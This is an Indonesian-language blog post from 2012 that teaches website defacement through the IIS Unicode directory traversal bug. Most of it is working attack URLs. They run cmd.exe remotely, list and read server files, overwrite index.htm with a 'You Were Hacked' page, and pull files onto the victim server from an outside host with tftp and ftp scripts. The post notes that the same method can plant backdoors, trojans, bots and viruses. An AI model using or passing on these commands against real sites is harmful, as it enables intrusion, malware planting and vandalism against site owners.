Rabu, 08 Agustus 2012

0 Dasar-Dasar Deface


Jangan Lupa Tinggalkan Komentar Kalian Ya...!!!
Assalamu'alikum sop.. ktemu lagi nea sama saya sang calon bintang ip wkwkw
hmm gimana puasanya pada full kan he'... ok kita langsung saja mulai
Tollong di perhatikan ea .. asyikk heh just kidding.!!!
1. Kita Harus menentukan WebSite Target/ Sasaran Kita : www.target.loe contoh-->> www.target.com

2. Login
Ini Merupakan Directory yang Ada Di Web Site Tersebut
Directory Ini Di Configurasi Dengan Script tertentu Supayafile dalam Web tersebut Berhubungan Jika terjadi bug pada script nya maka kita bisa bembus web ini
ada beberapa contoh login diantaranya :

a)/_vti_bin
b)/_vti_cnf
c)/cgi-bin
d)/scripts
e)/msadc

3. Unicode --->> merupakan code yang dapat membaca script configurasi website tersebut code ini yang dapat membaca bug cgi nya
hasil codingnya seperti bisa 1-3 x pengulangan tergantung target yang akan kita hackinng
a) ..%c1%1c..
b) ..%c0%9v..
c) ..%c0%af..
d) ..%c0%qf..
e) ..%c1%8s..
f) ..%e0%80%af..
g) ..%c1%9c..
h) ..%c1%pc..

4. OS target -->>ini Menyatakan Sertificate Web Os kita WinNT dan Win98
0xB5 ISO 8859-1
0xC5 ISO 8859-1
0xEA CP437
0x2140 JIS X 0208
0x22 ISO 8859-1

5. Cara Kerja
Secara Garis Besar deface Ini dilakukan Dengan tiga Cara yaitu :
A.) Deface WebSite Perintah Echo

a.)Secara umum : http://target/login/unicode/os/system/c+dir atau http://www.target.com/login/unicode/os/system/c+dir

http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?%2Fc+dir+c:

Jika terdapat Bug Maka Pada title brower kita ada kata CGi Error Maka Kita telah menembus web site itu
Maka Yang terlihat pada brower kita adalah list yang berupa isi hardisk webserver tersebut sama halnya
command dir yang kita lakukan di Dos Prompt
Directory of c:
10/05/2001 19:56 Programs Files
10/05/2001 19:56 Inetpub
08/05/2001 10:23 230 cmd.exe
24/04/2001 04:33 4.620 1home.htm
05/10/2000 12:40 668 about.htm
10/05/2001 19:54 AboutUs
11/05/2001 10:28 131 about_us.htm
28/10/2000 14:49 4.911 about_us.old.htm

b.)Setelah berhasil liat List Hardisk Kita Harus cari Path_Translade web nya dengan menggunakan command /c+dir+c: di ubah menjadi /c+set

http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?%2Fc+dir+c: menjadi http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?%2Fc+set /c+dir+c: di ubah menjadi /c+set

maka Akan keluar CGI error yang isinya menyatakan Configurasi Batch Sytem WebServer tersebut. Keluar Macam - Macam, Yang Perlu dilihat cuma:
Path_Translated=d:\inetpub\wwwroot

c.) Langkah Selanjutnya Adalah Copy file cmd.exe dengan nama baru cmd1.exe atau nama anda contoh Jangkrik.exe dengan mengganti

/c+dir+c: menjadi /c+copy+c:

lalu ditambahkan dengan : winntsystem32cmd.exe+c:jangkrik.exe

sehingga kita dapatkan :
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?%2Fc+copy+c%3Awinntsystem32cmd.exe+c%3Ajangkrik.exe

sekarang kamu bisa liat file cmd1.exe udah ada di direktori :

http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?%2Fc+dir+c:
Tujuan Ini Sebenarnya untuk menyingkat command pada addres ie kita

d.) Cari halaman index ke www.target.com/blah.ida
Kadang-kadang ekstensi .ida yang tidak diketahui akan merespon lokal path.
Kalo trik .ida tidak bekerja, coba gunakan direktori InetPub :

http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?%2Fc+dir+c%3Ainetpub
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?%2Fc+dir+c%3Ainetpubwwwroot
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?%2Fc+dir+c%3Ainetpubwwwrootindex.htm

sebenarnya langkah ini tidak perlu tapi untuk jaga -jaga kan ngak papa
dengan langkah b.) tadi sebenarnya kita sudah tau dimana letah index.htm nya atau dengan kata lain folder webnya

e.) kalau lo merasa dirinya hacker backup dulu halaman depan web nya, karena hacker kerjanya bukan menghancurkan tapi memperingatkan
hanya orang - orang amatiran atau katalain orang yang berjiwa vandalis yang kerja merusak tanpa backup index.htm nya, jika tidak kita menulisnya dengan nama file baru dengan cara :

http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?%2Fc+copy+c%3Ainetpubwwwrootindex.htm+c%3Ainetpubwwwrooti ndex.htm.bak

f.) Baru Kita deface atau echo Halaman Depannya dengan command dibawah ini :

http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?%2Fc+echo+You+Were+Hacked+>+c:inetpubwwwrootindex.htm
untuk tidak merusak web nya kita tulis dengan nama file baru
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?%2Fc+echo+You+Were+Hacked+>+c:inetpubwwwrootjangkrik.htm

/c+echo+You%20Were%20Hacked+>+c: >>> adalah untuk menuliskan kata-kata You Were Hacked pada

c:inetpubwwwrootindex.htm file yang ditulis atau c:inetpubwwwrootjangkrik.htm file yang ditulis

Untuk Anda yang telah Paham Bahasa Html Kalau pengen Hasil Defacenya keren Gunakan command ini
/c+echo"
This Web Site Hacking BY ....:::J.A.N.G.K.|.K:...
Thanks To Pepole On Irc.Dal.net %23MinangCrew And %23Hackermuda
"+>+c:inepubwwwrootindex.htm
/c+echo"
This Web Site Hacking BY ....:::J.A.N.G.K.|.K:...
Thanks To Pepole On Irc.Dal.net %23MinangCrew And %23Hackermuda
"+>+c:inepubwwwrootjangkrik.htm
keterangan :
%3d adalah pernyataan tanda =
%22 adalah Pernyataan tanda "
%23 adalah pernyataan tanda #
Untuk Anda Yang Paham Html Anda Bisa NGapain aja Tuh Deface Web Anda. Biar Bagus hack deface nya di input pakai Flash juga

g.) Langkah terkahir untuk liat hasilnya Membaca file yang lain dengan menggunakan perintah 'type' :

http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?%2Fc+type+c%3Ainetpubwwwrootindex.htm
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?%2Fc+type+c%3Ainetpubwwwrootjangkrik.htm
Atau liat Langsung aja http://www.target.com/ atau www.target.com/jangkrik.htm

Jika dikau menemukan webserver ini dalam penulisannya accses denied ( penolakan penulisan ) Maka langkah kedua yaitu dengan cara tftp:

B.) Deface WebSite Dengan Cara tftp

Deface nya dilakukan dengan meng-upload file lewat TFTP32
Untuk Mendukung Tftp kita download dulu softwarenya http://www.download.com/ ketik keyword nya TFTP32
Dikau Main Di Kompi diserver (sebab di user pasti takkan bisa).
Meng-upload file lewat TFTP32.. koe tdk perlu mengcopy cmd.exe nyah langsung sajah.
mari kita mulai meng-uploadnyah perintahnya sesuai langkah berikut ini :

a.) Kita Lakukan Langkah a.) (A.)pada deface dengan echo untuk mencari vulnernnya atau bug cginya
sehingga kita mendapatkan holenya atau script nya http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/
langkah selanjutnya yaitu uploadnya lagi. Namun Sebelumnya kita Dah siapkan File htm/html halaman web defacenya ( berkreasi lah dikau disini )
Setelah semua siap baru upload dengan command http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+tftp+-i+202.95.145.71(IP mu)+get+antique.htm(file yg mau koe up-load)+ C:InetPubwwwrootmain.html

b.)Kita liat lagi apa yg terjadi di IE kita.

CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are :

Waa..waaa .selamat dikau telah berhasil meng-upload file dikau memakai sofwer TFTP32 tadee silahkan buka web site target tadi

Kekurangannyah dalam meng-upload file lewat TFTP32 terkadang suatu server (web site) tidak mau menerima up-load file kita tadee. Jikalau itu terjadi maka gunakanlah cara pertama di atas tadee.

C.) Dengan Cara Ftp Dengan Web Kita Yang Telah Kita Isi Dengan Bahan Deface Kita

Langkah Pertama adalah kita bikin dulu domain gratisan di web server gratisan. di web itu kita drop halaman web deface kita atau backdoor,virus atau program penghancur lainnya

selanjutnya kita lakukan Sama dengan Cara langkah a.)(A.) setelah dikau tau hole cgi bugnya atau unicodennya maka dikau lakukan langkah berikut ini:

a.) Setelah kita menemukan vulnernya
http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+dir+c:
Directory of c:
10/05/2001 19:56
Programs Files
10/05/2001 19:56
Inetpub
08/05/2001 10:23 230 cmd.exe
24/04/2001 04:33 4.620 1home.htm
05/10/2000 12:40 668 about.htm
10/05/2001 19:54
AboutUs
11/05/2001 10:28 131 about_us.htm
28/10/2000 14:49 4.911 about_us.old.htm

b.) Lalu kita lakukan langkah copy sesuai di langkah b.)(A.) ---->>tujuan nya memendekkan command unicode nya

c.) Lalu Kita Liat +set nya untuk melihat patch translade nya
http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+set

Kira Nya path nya di c:inetpubwwwroot

d.)Langkah Selanjutnya Yaitu kita membuat script ftp
- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+open+geocities.com+>>+c:inetpubwwwrootjangkrik.ftp
- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+jangkrik+>>+c:inetpubwwwrootjangkrik.ftp
- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+anuamakang+>>+c:inetpubwwwrootjangkrik.ftp
- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+lcd+c:inetpubwwwroot+>>+c:inetpubwwwrootjangkrik.ftp
- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+ascii+>>+c:inetpubwwwrootjangkrik.ftp
- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+get+jangkrik.htm+>>+c:inetpubwwwrootjangkrik.ftp
- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+close+>>+c:inetpubwwwrootjangkrik.ftp

Setelah Scrip jangkrik.ftp selesai di liat lagi script nya apa benar
http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+type+c:inetpubwwwrootjangkrik.ftp

Setelah selesai script tuh kita jalan kan lagi script nya:
http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+ftp+-s:c:inetpubwwwrootjangkrik.ftp

buka ie satulagi untuk liat file nya dah smapai belum
http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+dir+c:inetpubwwwroot
Kalau dah terkirim selamat dah


Keterangan nya :
Pada scrip jangkrik.ftp itu kita muatkan hal ini sebenarnya
open geocities.com --->>> scriptnya --->> +echo+open+geocities.com+>>+c:inetpubwwwrootjangkrik.ftp
jangkrik --->> user name --->>> scriptnya -->> +echo+jangkrik+>>+c:inetpubwwwrootjangkrik.ftp
anuamakang --->>> password --->>> scriptnya -->> +echo+anuamakang+>>+c:inetpubwwwrootjangkrik.ftp
lcd c:inetpubwwwroot --->>> folder tujuan --->>> scriptnya -->>>+echo+lcd+c:inetpubwwwroot+>>+c:inetpubwwwrootjangkrik.ftp
ascii --->>> bentuk file --->>> scripnya --->>> +echo+ascii+>>+c:inetpubwwwrootjangkrik.ftp
get jangkrik.htm ---->>> command tranfer file --->>> +echo+get+jangkrik.htm+>>+c:inetpubwwwrootjangkrik.ftp
close --->> perintah dc ke web server ---->>> scripnya --->>> +echo+close+>>+c:inetpubwwwrootjangkrik.ftp

hehehe Dengan cara ini anda dapat drop apa saja keweb orang tuh baik itu web deface, backdror, ircserver, bot, bnc, psybnc, trojan and virus deh..........

untuk mengirim file yang binary kode bentuk file dari asci di ubah menjadi binary
seng duwur aku copas neng forum sebelah soalnya aku orak pinter nulis dowo karo kie tak kei seko gaweaan ku dewe dudu2 copas
sekedar share tool buat pemalas nie.. yg malas pake cara manual silahkan cobain yg ini,
tool ini sama kegunaanya kek punyanya om riluke (wekkzzz sok kenal wkwkwk)
cmn kalo buatannya om riluke kedetect sebagai trojan di kaspersky kalo ini ga ada sama skali n udah gwa buktiin ndiri
masalah kinerja ga jauh bedah lah.. sama buatannya riluke (itu sih pendapat gwa.. heheh)

0 komentar:

Poskan Komentar